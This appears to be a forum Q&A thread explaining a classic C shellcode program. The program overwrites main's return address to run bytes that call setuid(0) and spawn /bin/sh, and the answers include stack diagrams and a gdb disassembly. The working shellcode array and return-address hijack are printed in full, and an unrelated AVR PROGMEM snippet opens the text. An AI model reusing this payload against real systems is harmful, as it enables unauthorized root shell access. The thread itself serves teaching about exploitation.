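As one concrete example of such a custom attribute: on classic AVR parts, avr-gcc has traditionally needed PROGMEM plus the pgm_read_* accessors from avr-libc to keep a table in flash only (newer devices and toolchains that map flash into the data address space do not need this). A sketch with made-up table contents:
#include <avr/pgmspace.h>

static const float lut[4] PROGMEM = { 1.342f, 14.21f, 42.312f, 7.0f };

float lut_read(unsigned char i)
{
    /* pgm_read_float() fetches from program memory (flash) instead of SRAM */
    return pgm_read_float(&lut[i & 3u]);
}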

Can anyone explain this code to me?

WARNING: This is an exploit. Do not execute this code.
//shellcode.c
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int main() {
int *ret; //ret pointer for manipulating saved return.
ret = (int *)&ret + 2; //set ret to point to the saved return
//value on the stack.
(*ret) = (int)shellcode; //change the saved return value to the
//address of the shellcode, so it executes.
}
Can anyone give me a better explanation?
Apparently, this code attempts to change the stack so that when the main function returns, program execution does not return regularly into the runtime library (which would normally terminate the program), but would jump instead into the code saved in the shellcode array.
1) int *ret;
defines a variable on the stack, just beneath the main function's arguments.
2) ret = (int *)&ret + 2;
lets the ret variable point to an int * that is placed two ints above ret on the stack. Supposedly that's where the return address is located, where the program will continue when main returns.
3) (*ret) = (int)shellcode;
The return address is set to the address of the shellcode array's contents, so that shellcode's contents will be executed when main returns.
shellcode seemingly contains machine instructions that possibly do a system call to launch /bin/sh. I could be wrong on this as I didn't actually disassemble shellcode.
P.S.: This code is machine- and compiler-dependent and will possibly not work on all platforms.
Reply to your second question:
and what happens if I use ret=(int)&ret +2, and why did we add 2? Why not 3 or 4??? And I think that int is 4 bytes, so 2 will be 8 bytes, no?
ret is declared as an int*, therefore assigning an int (such as (int)&ret) to it would be an error. As to why 2 is added and not any other number: apparently because this code assumes that the return address will lie at that location on the stack. Consider the following:
This code assumes that the call stack grows downward when something is pushed on it (as it indeed does e.g. with Intel processors). That is the reason why a number is added and not subtracted: the return address lies at a higher memory address than automatic (local) variables (such as ret).
From what I remember from my Intel assembly days, a C function is often called like this: First, all arguments are pushed onto the stack in reverse order (right to left). Then, the function is called. The return address is thus pushed on the stack. Then, a new stack frame is set up, which includes pushing the ebp register onto the stack. Then, local variables are set up on the stack beneath all that has been pushed onto it up to this point.
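A quick way to see that downward growth on a typical implementation is to compare the addresses of a caller's and a callee's locals; a sketch of my own (the exact addresses are implementation details, so treat the output as illustrative only):
#include <stdio.h>

__attribute__((noinline))            /* keep a real call frame for the demo */
static void callee(int *caller_local)
{
    int callee_local = 0;
    /* With a downward-growing stack, the callee's locals usually end up at
       lower addresses than the caller's. */
    printf("caller local at %p, callee local at %p\n",
           (void *)caller_local, (void *)&callee_local);
}

int main(void)
{
    int caller_local = 0;
    callee(&caller_local);
    return 0;
}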
Now I assume the following stack layout for your program:
+-------------------------+
| function arguments | |
| (e.g. argv, argc) | | (note: the stack
+-------------------------+ <-- ss:esp + 12 | grows downward!)
| return address | |
+-------------------------+ <-- ss:esp + 8 V
| saved ebp register |
+-------------------------+ <-- ss:esp + 4 / ss:ebp - 0 (see code below)
| local variable (ret) |
+-------------------------+ <-- ss:esp + 0 / ss:ebp - 4
At the bottom lies ret (which is a 32-bit integer). Above it is the saved ebp register (which is also 32 bits wide). Above that is the 32-bit return address. (Above that would be main's arguments -- argc and argv -- but these aren't important here.) When the function executes, the stack pointer points at ret. The return address lies 64 bits "above" ret, which corresponds to the + 2 in
ret = (int*)&ret + 2;
It is + 2 because ret is an int*, and an int is 32 bits, therefore adding 2 means setting it to a memory location 2 × 32 bits (= 64 bits) above (int*)&ret... which would be the return address's location, if all the assumptions in the above paragraph are correct.
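The scaling rule itself is easy to check in isolation; a tiny sketch of my own, unrelated to the exploit:
#include <stdio.h>

int main(void)
{
    int x = 0;
    int *p = &x;
    /* Pointer arithmetic scales by the pointed-to size: with 4-byte ints,
       p + 2 is 2 * sizeof(int) = 8 bytes past p. */
    printf("sizeof(int) = %zu\n", sizeof(int));
    printf("p     = %p\n", (void *)p);
    printf("p + 2 = %p\n", (void *)(p + 2));
    return 0;
}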
Excursion: Let me demonstrate in Intel assembly language how a C function might be called (if I remember correctly -- I'm no guru on this topic so I might be wrong):
// first, push all function arguments on the stack in reverse order:
push argv
push argc
// then, call the function; this will push the current execution address
// on the stack so that a return instruction can get back here:
call main
// (afterwards: clean up stack by removing the function arguments, e.g.:)
add esp, 8
Inside main, the following might happen:
// create a new stack frame and make room for local variables:
push ebp
mov ebp, esp
sub esp, 4
// access return address:
mov edi, ss:[ebp+4]
// access argument 'argc'
mov eax, ss:[ebp+8]
// access argument 'argv'
mov ebx, ss:[ebp+12]
// access local variable 'ret'
mov edx, ss:[ebp-4]
...
// restore stack frame and return to caller (by popping the return address)
mov esp, ebp
pop ebp
ret
See also: Description of the procedure call sequence in C for another explanation of this topic.
The actual shellcode is:
(gdb) x /25i &shellcode
0x804a040 <shellcode>: xor %eax,%eax
0x804a042 <shellcode+2>: xor %ebx,%ebx
0x804a044 <shellcode+4>: mov $0x17,%al
0x804a046 <shellcode+6>: int $0x80
0x804a048 <shellcode+8>: jmp 0x804a069 <shellcode+41>
0x804a04a <shellcode+10>: pop %esi
0x804a04b <shellcode+11>: mov %esi,0x8(%esi)
0x804a04e <shellcode+14>: xor %eax,%eax
0x804a050 <shellcode+16>: mov %al,0x7(%esi)
0x804a053 <shellcode+19>: mov %eax,0xc(%esi)
0x804a056 <shellcode+22>: mov $0xb,%al
0x804a058 <shellcode+24>: mov %esi,%ebx
0x804a05a <shellcode+26>: lea 0x8(%esi),%ecx
0x804a05d <shellcode+29>: lea 0xc(%esi),%edx
0x804a060 <shellcode+32>: int $0x80
0x804a062 <shellcode+34>: xor %ebx,%ebx
0x804a064 <shellcode+36>: mov %ebx,%eax
0x804a066 <shellcode+38>: inc %eax
0x804a067 <shellcode+39>: int $0x80
0x804a069 <shellcode+41>: call 0x804a04a <shellcode+10>
0x804a06e <shellcode+46>: das
0x804a06f <shellcode+47>: bound %ebp,0x6e(%ecx)
0x804a072 <shellcode+50>: das
0x804a073 <shellcode+51>: jae 0x804a0dd
0x804a075 <shellcode+53>: add %al,(%eax)
This corresponds to roughly
setuid(0);
x[0] = "/bin/sh";
x[1] = 0;
execve("/bin/sh", &x[0], &x[1]);
exit(0);
That string is from an old document on buffer overflows, and will execute /bin/sh. Since it's malicious code (well, when paired with a buffer exploit), you should really include its origin next time.
From that same document, how to code stack based exploits :
/* the shellcode is hex for: */
#include <unistd.h>
int main() {
char *name[2];
name[0] = "sh";
name[1] = NULL;
execve("/bin/sh", name, NULL);
return 0;
}
char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0
\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c
\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
The code you included causes the contents of shellcode[] to be executed, running execve, and providing access to the shell. And the term shellcode? From Wikipedia:
In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability. It is called "shellcode" because it typically starts a command shell from which the attacker can control the compromised machine. Shellcode is commonly written in machine code, but any piece of code that performs a similar task can be called shellcode.
Without looking up all the actual opcodes to confirm, the shellcode array contains the machine code necessary to exec /bin/sh. This shellcode is machine code carefully constructed to perform the desired operation on a specific target platform and not to contain any null bytes.
The code in main() is changing the return address and the flow of execution in order to cause the program to spawn a shell by having the instructions in the shellcode array executed.
See Smashing The Stack For Fun And Profit for a description on how shellcode such as this can be created and how it might be used.
The string contains a series of bytes represented in hexadecimal.
The bytes encode a series of instructions for a particular processor on a particular platform — hopefully, yours. (Edit: if it's malware, hopefully not yours!)
The variable is defined just to get a handle to the stack. A bookmark, if you will. Then pointer arithmetic is used, again platform-dependent, to manipulate the state of the program to cause the processor to jump to and execute the bytes in the string.
Each \xXX is a hexadecimal byte. One or more of these bytes together form an op-code (look it up). Together they form machine code which can be executed by the machine more or less directly. And this code tries to execute the shellcode.
I think the shellcode tries to spawn a shell.
This just spawns /bin/sh, for example in C like execve("/bin/sh", NULL, NULL);
